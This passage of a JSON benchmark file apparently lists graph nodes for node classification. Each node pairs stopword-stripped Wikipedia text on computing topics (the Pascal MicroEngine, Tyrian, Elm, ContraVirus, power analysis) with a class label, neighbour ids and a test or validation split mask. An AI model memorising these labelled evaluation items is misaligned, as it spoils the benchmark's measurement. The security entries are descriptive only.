    "text": "Pascal_MicroEngine:pascal microengine pascal microengine series microcomputer products manufactured western digital 1979 mid-1980s designed specifically run ucsd p-system efficiently compared microcomputers ran machine language p-code interpreter pascal microengine interpreter implemented microcode p-code effectively native machine language common programming language used p-system pascal microengine ran special release iii p-system used platforms however enhancements release iii incorporated release iv made publicly available platforms microengine microengine series products offered various levels integration microengine chipset based mcp-1600 chipset formed basis dec lsi-11 low-end minicomputer wd16 processor used alpha microsystems using different microcode one well regarded systems s-100 bus based dual processor cards developed digicomp research ithaca ny cards deserve entry survived demise wd single-board system delivered reliable performance 2.5mhz typical configuration digicomp dual processor board set containing zilog z80 bipolar memory mapper harnessed microengine chipset second board linked direct cable sole configuration known still running 2018 documented web described marcus wigan contains 312 kb memory ram disc support modified z80 bios written tom evans taking advantage memory mapping chip z80 board using ucsd pascal iii version operating system tuned specifically wd chipset microengine booted ram-disc available software facility within ucsd pascal allowed system copy entire operating system ram disc transfer control sped remarkably use z80 bios handle devices allowed use range floppy discs i/o boards hard disk controllers performance microengine series simply interface age benchmarks originally designed basic programs documented australian computer society micsig paper presented national conference microcomputer software canberra act presented june 1982 along wide range contemporary machines compilers including z80 systems supported 9511 apu chip hosted digicomp s-100 microengine system used time introduction competitors 8-bit processors mainly intel 8080 z80 mos technology 6502 based systems microengine could compile pascal source code fraction time typically 1/10 required contemporaries fast compilation made microengine especially nice developer machine inclusion semaphore primitive microcode particularly useful multi user enhancements developed melbourne canberra australia-based ortex company extended multiuser system often sold bundled pharmacy management system also delivered sage iv computers ucsd pascal iv enabled multiuser system using sage multiuser bios rather extending ucsd pascal iv add semaphore performance advantage eroded later availability p-code native machine code translators mainstream 16-bit microprocessors intel 8086 motorola 68000 details microengine first released system accumulated large number pre-orders time first boards shipped poorly designed power ground traces size signal traces capacitors required large number modifications even work reliably couple years would pass introduction well-engineered microengine available damaged reputation introduction ibm pc end microengine modestly successful example commercial product based microengine avab viking lighting control system used modular microengine boards along custom hardware group led david a. fisher developed third validated ada compiler using modular microengine version 17.1 ada verification system use compiler later transferred mainframe/minicomputers name gensoft ada ran emulator microengine microengine-specific ucsd 3 operating system copies prime computer version known held r wigan also holds zero price licence full microengine ada system ucsd 3 operating system used modular microengine well three modular microengines used create 17.1 ada development 8 floppy discs ada full programming language available john lloyd university melbourne created early version prolog system basic fortran 77 compilers ported ucsd p-system implementations various times widely distributed due limited memory 62k 16-bit words last 2k words reserved memory-mapped i/o prom hard disk bootstrap code small ada programs could compiled one point compilation compiler swapped operating system disk gain little room da replaced ssmble main command menu native assembler available needed ucsd-based ada later redeveloped sage 4 telesoft san diego",
    "neighbors": [
      1952,
      8868,
      7173,
      7269,
      8262,
      1515,
      428,
      8524,
      1776,
      9714,
      11411
    ],
    "mask": "Test"
  },
  {
    "node_id": 218,
    "label": 7,
    "text": "Revel_Systems:revel systems revel systems ipad-based point sale system co-founded lisa falzone christopher ciabarra majority owned private equity firm welsh carson anderson stowe revel systems founded 2010 san francisco may 2011 revel received 3.7 million funding dcm 2015 company announced investment approximately 13.5 million roth capital partners bringing revel series c round approximately 110 million infusion roth revel c-3 investment round follow-up series c-1 round led welsh carson anderson stowe wcas november 2014 series c-2 round led intuit inc. december 2014 2015 company announced strategic partnership apple computers member apple enterprise mobility program 2014 revel announced partnership intuit create quickbooks point sale powered revel systems sept 2016 revel announced partnership shell global company integrates third party vendors open api allowing others customize pos system revel released atlas v2 ipad pos february 2012 revel systems headquarters located atlanta georgia additional offices located san francisco california vilnius lithuania european sales handled office london revel ipad point sale software focuses security order properly licensed system revel first ipad pos implement emv—or chip pin —processing united states january 2013 revel clients include following franchisees following shell smoothie king tully coffee little caesars pizza legends hospitality rocky mountain chocolate factory popeye louisiana kitchen illy coffee dairy queen forever yogurt twistee treat among others revel partnered retail giants belkin goodwill february 2017 announced falzone replaced ceo lisa falzone cto chris ciabarra removed majority share holder investment firm welsh carson anderson stowe majority stake company new ceo greg dukat revel systems point sale system operates apple ipad backend managed via mobile device via web browser associated hardware includes receipt printer cash drawer card swipe revel also announced revel ethernet connect cable 2015 allows hardwired ethernet connection ipads running revel software revel several pos systems culinary industry kitchen display system drive-through pos food truck pos restaurant pos retail pos systems include grocery pos retail pos quick service pos revel also systems large venues including stadium pos events pos revel systems offers range preconfigured hardware complement point sale system apple ipad acts business main pos terminal register transactions orders various functions take place ipad pos ipad mini used pos terminal customer-facing kiosks table-side ordering apple ipod touch serves line-buster customer-facing display terminals work epson printers wireless routers access points cash drawers card swipes barcode scanners meet merchant needs revel allows customizable point sale solution integrates variety third party providers providers payment include firstdata mercury payments levelup adyen paypal reporting provided companies including avero ctuit rti connect revel gift card providers include givex mercury plasticprinters synergy valutec loyalty reward program provided companies including levelup punchh loyaltree synergy revel systems include facebook twitter integration online ordering options provided companies including zuppler shopify revel managed hosting provided singlehop softlayer create menu items management console manage goods revel inventory management allowing business owners keep track manage inventory directly backend management console mobile device wifi management helps business establish strong wifi network use isp provided modem additional routers access points revel always mode customers pos run uninterrupted offline local network delivery management console business owners track orders employees deliveries customer relationship management crm allows businesses keep track customers customer preferences quickbooks integration users export reports file type choice including csv xls json import quickbooks accounting purposes purchase order generation allows business owners maintain database vendors well create track verify purchase orders payroll management provides users ability track audit labor hours employees paid correctly timely online ordering users integrate website online ordering revel pos allowing customers place orders online set pickup times revel reporting leverage management console compare real-time data historical trends guide business decisions revel systems included first list business news daily best ipad pos systems 2013 revel systems chosen best retail app business tabby awards ceo lisa falzone recognized tech cocktail one 15 female entrepreneurs know probably n't 2015 lisa falzone named fortune 40 40 list forbes list eight rising stars",
    "neighbors": [
      1346,
      6091,
      6539
    ],
    "mask": "Test"
  },
  {
    "node_id": 219,
    "label": 9,
    "text": "List_of_educational_programming_languages:list educational programming languages educational programming language programming language designed mostly instrument learning less tool writing programs perform work many educational programming languages position inside learning path sequence languages designed build others moving student easy understand entertaining environments full professional environments better known presented originally machine code first way program computers assembly language next type language used thus one oldest families computer languages use today many dialects implementations available usually computer processor architecture basic termed low level programming language one difficult languages work untyped rigid computers work low level several simplified dialects exist education low level languages must written specific processor architecture written taught isolation without referencing processor written unlike higher level languages using educational assembly language needs representation processor whether virtualized physical assembly helpful language use learning fundamental computer processor operation basic stands beginner all-purpose symbolic instruction code invented 1964 provide computer access non-science students became popular minicomputers 1960s became standard computing language microcomputers late 1970s early 1980s goals basic focused needs learning program easily easy beginners use interactive provide clear friendly error messages respond quickly require understanding computer hardware operating systems made basic particularly useful education small size programs useful programs illustrate concept could written dozen lines time basic require mathematical computer science sophistication basic continues day frequently self-taught excellent tutorials implementations see list basic dialects platform complete list basic offers learning path learning oriented basics microsoft small basic basic-256 simple full featured basics like visual basic .net gambas sun microsystems recommended path greenfoot bluej netbeans-bluej netbeans-java lisp second oldest family programming languages use today dialects implementations wide range difficulties lisp originally created practical mathematical notation computer programs based lambda calculus makes particularly well suited teaching theories computing one earliest languages lisp pioneered many ideas computer science including tree data structures automatic storage management dynamic typing object-oriented programming self-hosting compiler useful learning computer science name lisp derives list processing language linked lists one languages major data structures lisp source code made lists thus lisp programs manipulate source code data structure giving rise macro systems allow programmers create new syntax even new domain-specific languages embedded lisp lisps useful learning language design creating custom languages reasonable learning path would logo followed educational variant scheme newlisp followed professional variant common lisp part one laptop per child project sequence smalltalk-based languages developed designed act introduction next structure scratch etoys squeak smalltalk provides graphical environments may used teach programming concepts kids also physics mathematics simulations story-telling exercises etc. use constructive learning smalltalk squeak fully featured application development languages around well respected decades scratch children learning tool following chart helps summarize information parents teachers",
    "neighbors": [
      2304,
      9345,
      8450,
      2691,
      11269,
      3462,
      6536,
      8463,
      9871,
      9748,
      1301,
      5783,
      4633,
      797,
      6558,
      6047,
      1952,
      4769,
      8479,
      1443,
      3876,
      8609,
      934,
      6950,
      4392,
      9895,
      11555,
      5677,
      7471,
      4144,
      9391,
      9245,
      8116,
      9780,
      3517,
      9665,
      6338,
      6594,
      7234,
      3142,
      5830,
      8262,
      2505,
      9926,
      8524,
      1613,
      5837,
      847,
      9932,
      10964,
      11221,
      5852,
      477,
      10083,
      6502,
      2666,
      3562,
      5612,
      8554,
      2798,
      4846,
      1776,
      7919,
      9969,
      9331,
      11628,
      9975,
      6906,
      7421,
      6910
    ],
    "mask": "Test"
  },
  {
    "node_id": 220,
    "label": 9,
    "text": "Scripting_for_the_Java_Platform:scripting java platform scripting java platform framework embedding scripts java source code requirement given java virtual machine jvm include engines default oracle jvm java 6 later includes javascript engine based rhino version 1.6r2 java 8 nashorn since java 8 scripting java platform developed java community process jsr 223 final release jsr 223 happened december 11 2006 specification however withdrawn later december 13 2016 maintenance review ballot decided functionality would included integral part java 9 onward",
    "neighbors": [
      4960,
      8262,
      5677,
      3761,
      339,
      9780,
      3285,
      11670,
      6074,
      6143,
      5567
    ],
    "mask": "Test"
  },
  {
    "node_id": 221,
    "label": 3,
    "text": "SGI_Tezro:sgi tezro sgi tezro series high-end computer workstations sold sgi 2003 2006 using mips cpus running irix immediate successor sgi octane line systems produced rack-mount tower versions series released june 2003 list price tezro released alongside sgi onyx4 rack-mountable tezros share many components including plastic skins rack-mounted tezros functionally similar infinite performance-equipped sgi onyx350 tezro marked return original cube logo sgi machines replaced 2008 sgi virtu product line similar sgi systems tezro uses non-blocking crossbar interconnect connect subsystems together tezro based sgi origin 3000 architecture arcs provided boot firmware sgi computer systems era tezro systems use two four 64-bit mips r16000 microprocessors following r16000 processor types available options node boards onyx/origin 350/3900 systems compatible use ram example quad-r16k/700 mhz 8mb l2 board cx-brick work tezro likewise boards quad-1 ghz edition tezro shipped 512mb ddr sdram expanded using proprietary dimms tower version hold 8gb main memory total rack version hold 8gb per brick 2 bricks directly linked numalink cables 8 use numalink router tezro supports vpro v10 v12 graphics options dual-channel options produced desktop variants allowing two 1920x1200 displays dual-head dual-channel available rack version allowing fully equipped rackmount tezro drive four 1920x1200 displays tower systems shipped analog audio output standard pci cards provide audio capabilities including 2-channel 24-bit aes 8-channel adat connectors rack-mountable versions number available 64-bit pci slots included tezro system depends upon number cpus installed system pci slots tezro model 3.3v card slots single u160 scsi connector produced attaching external peripherals optional firewire card",
    "neighbors": [
      5380,
      5898,
      7311,
      5523,
      5272,
      3764,
      7093,
      11447,
      7234,
      10051,
      6858,
      9932,
      5076,
      7001,
      6243,
      6247,
      5356,
      1398,
      1149
    ],
    "mask": "Test"
  },
  {
    "node_id": 222,
    "label": 7,
    "text": "OMII-UK:omii-uk omii-uk open-source software organisation uk research community omii-uk number roles within uk research community helping new users get started e-research providing software needed developing software exist omii-uk also help guide development e-research liaising national international organisations e-research groups standards groups researchers omii-uk funded engineering physical sciences research council epsrc jisc omii-uk collaboration three bodies omii open middleware infrastructure institute started university southampton january 2004 january 2006 southampton group joined forces established mygrid ogsa-dai projects form omii-uk integral part uk e-science programme",
    "neighbors": [
      10625,
      2501,
      9040,
      158,
      7935
    ],
    "mask": "None"
  },
  {
    "node_id": 223,
    "label": 4,
    "text": "Copy_attack:copy attack copy attack attack certain digital watermarking systems proposed m. kutter s. voloshynovskiy a. herrige paper presented january 2000 photonics west spie convention scenarios digital watermark added piece media image film audio clip prove authenticity piece media presented found lack watermark would considered suspect alternatively security system could devised would limit user ability manipulate piece media contained watermark instance dvd burner may prohibit making copies film contained watermark copy attack attempts thwart effectiveness systems estimating watermark given originally watermarked piece media adding watermark un-watermarked piece first scenario listed would allow attacker inauthentic image declared authentic since contains watermark second scenario attacker could flood market content ordinarily would allow user manipulate saw fit due presence watermark limitations would imposed way schemes sought limit use watermarked media may prove unpopular wide distribution 2003 paper presented international conference acoustics speech signal processing john barr brett bradley brett t. hannigan digimarc describe way tie content digital watermark underlying image watermark placed different image watermark detection system would authenticate",
    "neighbors": [
      4617,
      8694
    ],
    "mask": "None"
  },
  {
    "node_id": 224,
    "label": 4,
    "text": "ContraVirus:contravirus contravirus rogue spyware application poses legitimate anti-spyware program application uses false scanner force computer users pay removal non-existent spyware items may also known expertantivirus contravirus may downloaded trojan horse along possible software typically may installed smitsfruad trojan contravirus known display fake messages stating user computer infected spyware may also install file wincom27.dll located c \\windows\\ ext32inc.dll located c \\windows\\system\\ order persuade user purchase software traditionally user see contravirus running scan computer time user prompted purchase contravirus software order remove threat may also hijack user browser install toolbar 95 98 nt xp server 2000 2000 server 2003 vista server 2008 7 server 2008 r2 operating systems capable becoming infected removal contravirus difficult may require assistance qualified support personnel however users success removing program using smitfraudfix.zip program well known programs kaspersky anti-virus spybot search destroy norton family security products",
    "neighbors": [
      10756,
      4165,
      9287,
      3496,
      4074,
      8976,
      6643,
      2005,
      10392,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 225,
    "label": 8,
    "text": "Web_server:web server web server server software hardware dedicated running said software satisfy world wide web client requests web server general contain one websites web server processes incoming network requests http several related protocols primary function web server store process deliver web pages clients communication client server takes place using hypertext transfer protocol http pages delivered frequently html documents may include images style sheets scripts addition text content user agent commonly web browser web crawler initiates communication making request specific resource using http server responds content resource error message unable resource typically real file server secondary storage necessarily case depends web server implemented primary function serve content full implementation http also includes ways receiving content clients feature used submitting web forms including uploading files many generic web servers also support server-side scripting using active server pages asp php hypertext preprocessor scripting languages means behaviour web server scripted separate files actual server software remains unchanged usually function used generate html documents dynamically on-the-fly opposed returning static documents former primarily used retrieving modifying information databases latter typically much faster easily cached deliver dynamic content web servers frequently found embedded devices printers routers webcams serving local network web server may used part system monitoring administering device question usually means additional software installed client computer since web browser required included operating systems march 1989 sir tim berners-lee proposed new project employer cern goal easing exchange information scientists using hypertext system project resulted berners-lee writing two programs 1990 1991 1994 simplicity effectiveness early technologies used surf exchange data world wide web helped port many different operating systems spread use among scientific organizations universities subsequently industry 1994 berners-lee decided constitute world wide web consortium w3c regulate development many technologies involved http html etc standardization process web servers able map path component uniform resource locator url static request url path specified client relative web server root directory consider following url would requested client http client user agent translate connection nowiki www.example.com /nowiki following http 1.1 request web server nowiki www.example.com /nowiki append given path path root directory apache server commonly /home/www unix machines usually /var/www result local file system resource web server reads file exists sends response client web browser response describe content file contain file error message return saying file exist unavailable web server either incorporated os kernel user space like regular applications web servers run user-mode ask system permission use memory cpu resources requests kernel take time always satisfied system reserves resources usage responsibility share hardware resources running applications executing user mode also mean useless buffer copies another handicap user-mode web servers web server program defined load limits handle limited number concurrent client connections usually 2 80,000 default 500 1,000 per ip address tcp port serve certain maximum number rps also known queries per second qps depending web server near limit becomes unresponsive time web servers overloaded due symptoms overloaded web server partially overcome average load limits prevent overload popular web sites use common techniques like latest statistics market share sites top web servers internet w3techs usage web servers websites web servers used less 1 websites latest statistics market share sites top web servers internet w3techs usage web servers websites web servers used less 1 websites latest statistics market share sites top web servers internet netcraft february 2017 web server survey latest statistics market share sites top web servers internet netcraft february 2016 web server survey apache iis nginx used web servers world wide web",
    "neighbors": [
      4096,
      9732,
      7175,
      4622,
      7695,
      9744,
      9745,
      10254,
      5139,
      1556,
      9238,
      10262,
      7708,
      7710,
      4640,
      546,
      9762,
      9766,
      5673,
      8745,
      1579,
      44,
      558,
      2606,
      8751,
      10800,
      4658,
      9780,
      10809,
      5178,
      6714,
      5181,
      10815,
      64,
      1089,
      10816,
      1605,
      4171,
      5196,
      5199,
      7248,
      11345,
      595,
      87,
      5724,
      6236,
      8797,
      2661,
      2666,
      3178,
      9834,
      9325,
      3182,
      11376,
      113,
      1650,
      8310,
      119,
      2168,
      11386,
      124,
      7806,
      10368,
      10370,
      7812,
      653,
      6797,
      5788,
      2717,
      670,
      159,
      3744,
      4768,
      3746,
      7329,
      7838,
      3237,
      8350,
      8863,
      8865,
      4777,
      7338,
      9380,
      9387,
      2222,
      11439,
      11440,
      177,
      10933,
      1206,
      10939,
      4284,
      4797,
      1215,
      5314,
      1223,
      714,
      5327,
      8914,
      1747,
      11134,
      1240,
      1757,
      4837,
      7398,
      5353,
      6379,
      8941,
      11502,
      2287,
      3837,
      9981,
      9471,
      5378,
      11011,
      7430,
      1802,
      1803,
      10506,
      9997,
      7443,
      10004,
      10520,
      7962,
      10522,
      4893,
      7967,
      10016,
      7457,
      8994,
      2339,
      10020,
      2853,
      8998,
      807,
      10530,
      7983,
      823,
      2364,
      8000,
      5442,
      10058,
      331,
      3920,
      11090,
      1363,
      10579,
      2901,
      1367,
      4439,
      7515,
      9052,
      6493,
      5470,
      10588,
      8032,
      865,
      2404,
      4453,
      2409,
      9580,
      10611,
      5492,
      8054,
      1400,
      10109,
      2430,
      3966,
      1920,
      2432,
      1410,
      5506,
      6016,
      4485,
      3462,
      10622,
      4488,
      905,
      3978,
      4490,
      5516,
      8585,
      9097,
      11147,
      1937,
      4498,
      11154,
      3993,
      2975,
      9119,
      11167,
      5026,
      11682,
      5029,
      7078,
      9125,
      5036,
      9647,
      6576,
      1970,
      2995,
      2485,
      9142,
      11189,
      7608,
      8122,
      5567,
      8132,
      8644,
      1991,
      2504,
      971,
      8142,
      4050,
      5077,
      6615,
      3545,
      474,
      4059,
      8157,
      5093,
      11237,
      4072,
      5608,
      9193,
      7659,
      11250,
      8691,
      2041,
      510
    ],
    "mask": "None"
  },
  {
    "node_id": 226,
    "label": 2,
    "text": "Tyrian_(video_game):tyrian video game tyrian scrolling shooter computer game developed eclipse software published 1995 epic megagames game re-released freeware 2004 graphics made available open content license april 2007 tyrian programmed jason emery illustrated daniel cook music composed alexander brandon andras molnar game set year 20,031 player takes role skilled terraforming pilot named trent hawkins employed scout habitable locations newly terraformed planets latest assignment planet tyrian located near territory hazudra lizard-like race one day buce quesillac hazudra trent best friend shot back hoverdrone quickly disappears sky buce lives long enough tell trent attack work microsol giant corporation controls terraformation tyrian want buce dead knowledge gravitium special mineral unique tyrian able control force gravity microsol wants use gravitium power warships could result becoming nearly unstoppable stop nothing eliminate anyone knows existence trent next person hit list buce implores try reach savara free world buce dies trent secures small fighter departs savara tyrian arcade-style vertical scrolling shooter developed chiefly homage works compile particularly zanac series player controls space ship fitted different weapons front back linked button two external pods buttons equipment game presents variety enemies flying fixed rails bosses many occurrences fixed and/or indestructible obstacles player starship destroyed must take enough damage exhaust several points shields regenerate time armor tyrian full game mode features credit equipment-buying system shield/armor hit points similar game mechanics another pc game period arcade mode characteristics coin-op arcade shooters in-game powerups extra lives three levels difficulty choose easy medium hard well hidden options impossible suicide lord game hard difficulty employ enemies health well fire bullets per second certain hidden levels available hard difficulty provide ample opportunities unique powerups upgrades certain levels hard setting also prevents player seeing enemies outside conical line-of-sight upon completion game player receives password one several hidden ships well options replaying game higher difficulty setting main mode single player full story mode mode includes storyline-related messages shop start level certain enemies destroyed certain points game player choice levels player begins one standard weapon may upgraded replaced later weapons include multi-directional cannons lightning guns beam lasers heavy missiles homing bombs player craft accommodates front rear gun front weapons mostly limited forward arcs rear weapons often come wider coverage including side rear shots rear weapons two selectable fire modes focusing either mostly forward mostly sideways/rearward types weapons eleven levels making upgradeable 10 times although higher levels cost exponentially well require stronger generator support them.. player purchase two sidekicks fly alongside ship simply act another weapon others stronger attacks limited limited ammunition pool upgrades include increased shields powerful generators allow stronger weapons shields armour higher maneuverability shops let player build strong ship budget penalty failing trying different build weapon upgraded stores even available sale item sold however player obtain sold items without reaching another level offers many cases single secret level whole game may contain unique weapon equipment arcade mode player picks front guns rear guns sidekicks along way instead purchasing front weapons upgraded picking purple bubbles destroyed enemies number purple orbs required increases exponentially advance higher power levels front rear guns also upgraded next level picking powerup pods found destroying specific enemy ship shields generators upgradeable although player given medium attribute ship possible switch single player 1 person arcade modes using secret routine cheat codes since possible find exotic weapons early arcade mode using switch allows weapons brought single player likewise generator shield upgrades single player result better ship arcade mode two player arcade mode players control two different ships known dragonhead dragonwing players combine ships one forming steel dragon first player controlling combined ship second player controlling turret tyrian enables two players connected via modem dragonhead front gun powerups variety dragonwing rear gun pickups better maneuverability smaller profile making easier dodge enemy fire also controls special powerup weapons soul zinglon repulsor dragonwing larger slower heavily armored picks rear powerups although unlike equivalent single player rear gun dragonwing fires mostly forward instead side rear also controls sidekick weapons dragonwing unique charge-up ability main gun player decides fire short period time power blast accumulates five charge levels weapon collecting spherical purple powerups gives dragonwing ability charge-up faster mode available tyrian 2000 player chooses three levels play deliani space station savara game automatically starts player given set time complete level collecting power-ups fighting enemies killing boss level complete score calculated depending time life destruction killed enemies game also features 7 9 tyrian 2000 hidden super arcade modes specialized ships requiring user type certain codewords shown beating game first code given beating regular game consecutive code given beating mode comes mode enabled typing engage title screen disables cheat codes command parameters sets difficulty lord game suicide scroll lock key held player possesses stalker 21.126 ship along small shield one weapon atomic rail gun weapons available however ship able generate many different weapons player performs particular sequences movements weapon-firing headlight effect always turned super tyrian obscure objects within 90-degree field view front player ship destruct minigame concealed inside tyrian reminiscent scorched earth human-vs-human human-vs-computer modes play played typing destruct main menu screen zinglon ale mini-game players must try gather much ale possible dodging wave wave bouncing enemies clearing screen enemies fully advancing next level cleared game continues infinitely growing ever harder zinglon squadrons mini-game similar galaxian galaga large formations ships fly attack individual ships groups break fly various ways players must destroy whole fleet advance next fleet basically must shoot everything possible players must shoot small enemies advance next level mini-game zinglon revenge giant ship projects horizontal field energy small enemies fall bounce around edges screen energy field touching field one small enemies means almost certain instant death players must shoot small enemies advance next level tyrian developed credited total 11 people three main drivers — alexander brandon composer writer jason emery programmer level designer daniel cook artist interface designer aforementioned developers tyrian first commercial video game origins tyrian began experiment 1991 young jason emery showing friend alexander brandon preliminary workings scrolling background two continued developing eventually decided work could shown game company brandon wrote proposal document sent two leading shareware game publishers time epic megagames apogee however game lacked sound music graphics definitely professional neither got overly excited showed interest two developers thought would never find publisher however long wait robert allen—head safari software—considered tyrian fit perfectly company handled smaller scale projects robert allen word cliff bleszinski tyrian similar zanac thinking followed robert allen gave leads sound coders artists first bruce hsu created interface graphics character faces artist daniel cook hired composer alexander brandon showed interest artwork was—unbeknown cook— sent around friend sent short list levels cook created sample artwork amiga 1200 met praise developers asked make artwork completed 4-month period work began graphics popularity tyrian rose epic megagames arturo sinclair storm front studios joined create rendered artwork planets character faces developers wanted simple fun interface changed least three times deciding final design point tyrian almost complete loudness sound system near-completed sound effects marketing plan head mark rein time tim sweeney approached team informed tyrian published full-fledged epic megagames product later released 1995 data cubes found game full mode contain various references parent publishers including one must fall 2097 jazz jackrabbit pretzel pete tyrian 2000 pretzel pete truck weapon reference pretzel pete video game version 1.0 game originally released shareware consisting episode 1 game version 1.1 first published registered version consists first three episodes includes various bugfixes registered version also includes ship editor later available separate download version 2.0 added episode 4 end fate several new game modes like two-player mode version 2.01/2.1 fixed keyboard bugs includes christmas mode triggered starting game december 1999 tyrian re-released tyrian 2000 includes additional fifth episode bug fixes additional ships include phoenix ii storm red dragon pretzel pete truck pretzel pete video game published xsiv games datacube transmission source epic megagames game renamed transmission source xsiv games pretzel pete game ad however references epic megagames titles remain although claims windows compatibility achieved using .pif file building native windows application world tree games developed versions game boy color game boy advance publisher symmetry entertainment closed european publisher stealth productions inc. stealth media group inc. obtained publication rights game cancelled game boy versions eventually released compiled format 2007 freeware world tree games game boy color version full game incorporates shorter story episodes 1-4 original dos game planet ixmucane core always gets destroyed end levels redesigned rear weapon dos game available player carry two sidekick weapons one usable time new game modes items unlocked purchasing extras using credits obtained completing stage game boy advance version incorporates graphics dos game level layout game play based game boy color game two sidekick weapons fired time super arcade audio included new game challenge mode additional levels unlocked completing existing challenge levels february 2007 pascal x86 assembly source code tyrian licensed small group developers re-write c project named opentyrian licensed gnu general public license plans releasing original source code jason emery released 2007 tyrian assets freeware along game boy game boy advance versions following announcement april 2007 daniel cook announced free availability tyrian artwork including later work game boy color edition tyrian 2000 generic liberal terms open content creative commons attribution 3.0 license since community development happened bitbucket repository many ports many mobile desktop computing platforms music tyrian created alexander brandon additional music andras molnar lds loudness sound system format tyrian 2000 cd includes 25 tracks red book audio format red book tracks omitted freeware version due download size tracks zanac3 zanac5 reproductions two songs msx/nes game zanac alexander brandon released music tyrian free august 2010 game mostly received positive reviews tyrian scored 87 pc gamer one percent editor choice award reviewer next generation complimented use shop system acquiring powerups ability save games time inclusion storyline provide reason behind killing everything see scored game four five stars computer gaming world nominated tyrian action game year original developers jason emery alexander brandon considered tyrian nowiki /nowiki reception far expectations",
    "neighbors": [
      477,
      9408,
      11522,
      8524,
      823,
      6797,
      10287,
      6129,
      4818,
      499,
      2391,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 227,
    "label": 3,
    "text": "Saint_Dragon:saint dragon storm software development team sales curve silkworm ninja warriors affiliated accolade conversion project managed dan marchant programming andrew taylor music tony williams graphics sean mcclurg working zx spectrum conversion taylor spent two weeks reading reviews scrolling games studied videos arcade board gameplay noted several challenges huge sprites half size screen use vast amount memory thing st dragon alien seems make much complicated series moves say r-type 've got try reproduce pretty complicated also wanted achieve smooth scrolling rather by-character-block movement r-type without sacrificing speed method called pre-shifts eventually used several versions sprite held memory slightly different position cycled give appearance smooth movement used memory restricted game 128k models spectrum larger sprites leaping puma handled dividing strips separate co-ordinated entities saint dragon side-scrolling shoot 'em player controls cyborg saint dragon rebelled tyrannical monster cyborg army saint dragon initially armed plasma bolts fiery breath collecting tokens dragon firepower upgraded pulse torpedoes laser bouncing bombs ring lasers turret tokens upgrade dragon speed weapon power initiate hyper mode endows maximum firepower invulnerability addition dragon armoured tail follows player movement allowing used defensive shield five levels culminating battle large end-of-level guardian zx spectrum conversion well received initial release crash awarded 92 finding dragon theme refreshing change genre graphics highlighted well animated smooth colourful sinclair awarded 80 criticizing uneven difficulty low number levels praising pretty tough blast-a-minute budget re-release 1992 sinclair adjusted rating 29 criticizing hideously slow graphically abysmal impossibly tedious load old junk stuart campbell took issue cassette multi-load invisible border reduced playing area framerate drop multiple sprites screen",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 228,
    "label": 9,
    "text": "Elm_(programming_language):elm programming language elm domain-specific programming language declaratively creating web browser-based graphical user interfaces elm purely functional developed emphasis usability performance robustness advertises runtime exceptions practice made possible elm compiler static type checking elm initially designed evan czaplicki thesis 2012 first release elm came many examples online editor made easy try web browser evan czaplicki joined prezi 2013 work elm 2016 moved noredink open source engineer also starting elm software foundation initial implementation elm compiler targets html css javascript set core tools continued expand including repl package manager time-traveling debugger installers mac windows elm also ecosystem community created libraries advanced online editor allows saved work inclusion community libraries elm small expressive set language constructs including traditional if-expressions let-expressions local state case-expressions pattern matching functional language supports anonymous functions functions arguments partial application currying default semantics include immutable values stateless functions static typing type inference elm programs render html virtual dom may interoperate code using javascript service values elm immutable meaning value modified created elm uses persistent data structures implement codice_1 codice_2 codice_3 libraries elm statically typed type annotations optional due type inference strongly encouraged annotations exist line definition unlike c-family languages types names interspersed elm uses single colon mean type types include primitives like integers strings basic data structures lists tuples records functions types written arrows example codice_4 custom types allow programmer create custom types represent data way matches problem domain types refer types example codice_5 types always capitalized lowercase names type variables example codice_6 list values unknown type type empty list argument codice_7 agnostic list elements special types programmers create interact elm runtime example codice_8 represents virtual dom tree whose event handlers produce messages type codice_9 rather allow value implicitly nullable javascript codice_10 null pointer elm standard library defines codice_11 type code produces handles optional value explicitly using type code guaranteed value claimed type actually present elm module system allows users break code smaller parts called modules modules hide implementation details helper functions group related code together modules serve namespace imported code codice_12 third party libraries packages consist one modules available elm public library libraries versioned according semver enforced compiler tools removing function changing type done major release elm uses abstraction called ports communicate javascript allows values flow elm programs making possible communicate elm javascript elm library called elm/html programmer use write html css within elm uses virtual dom approach make updates efficient unlike haskell purescript elm support higher-kinded types thus provide generic abstractions many common operations example generic codice_13 codice_14 codice_15 codice_16 function instead names used prefixed module codice_17 codice_18",
    "neighbors": [
      9345,
      4101,
      3462,
      8582,
      5651,
      10387,
      1813,
      2069,
      1435,
      1051,
      9245,
      7326,
      3876,
      4777,
      5677,
      2045,
      1203,
      8116,
      6074,
      6718,
      10819,
      8644,
      8262,
      5833,
      5067,
      8524,
      7889,
      11219,
      2519,
      7386,
      8923,
      477,
      6502,
      10470,
      8554,
      10991,
      3960,
      3705,
      7292,
      2557
    ],
    "mask": "Validation"
  },
  {
    "node_id": 229,
    "label": 4,
    "text": "Power_analysis:power analysis cryptography power analysis form side channel attack attacker studies power consumption cryptographic hardware device smart card tamper-resistant black box integrated circuit attack non-invasively extract cryptographic keys secret information device simple power analysis spa involves visually interpreting power traces graphs electrical activity time differential power analysis dpa advanced form power analysis allow attacker compute intermediate values within cryptographic computations statistical analysis data collected multiple cryptographic operations spa dpa introduced open cryptology community 1998 paul kocher joshua jaffe benjamin jun simple power analysis spa side-channel attack involves visual examination graphs current used device time variations power consumption occur device performs different operations example different instructions performed microprocessor differing power consumption profiles result power trace smart card using des encryption sixteen rounds seen clearly similarly squaring multiplication operations rsa implementations often distinguished enabling adversary compute secret key even magnitude variations power consumption small standard digital oscilloscopes easily show data-induced variations frequency filters averaging functions built oscilloscopes often used filter high-frequency components differential power analysis dpa side-channel attack involves statistically analyzing power consumption measurements cryptosystem attack exploits biases varying power consumption microprocessors hardware performing operations using secret keys dpa attacks signal processing error correction properties extract secrets measurements contain much noise analyzed using simple power analysis using dpa adversary obtain secret keys analyzing power consumption measurements multiple cryptographic operations performed vulnerable smart card device high-order differential power analysis ho-dpa advanced form dpa attack ho-dpa enables multiple data sources different time offsets incorporated analysis ho-dpa less widely practiced spa dpa analysis complex vulnerable devices broken easily spa dpa power analysis provides way see inside otherwise 'tamperproof hardware example des key schedule involves rotating 28-bit key registers many implementations check least significant bit see 1 device shifts register right prepends 1 left end bit zero register shifted right without prepending 1 power analysis distinguish processes enabling adversary determine bits secret key implementations algorithms aes triple des believed mathematically strong may trivially breakable using power analysis attacks result power analysis attacks combine elements algorithmic cryptanalysis implementation security applications devices may fall physical possession adversary protection power analysis generally major design requirement power analyses also reportedly used conditional access modules used pay television systems equipment necessary performing power analysis 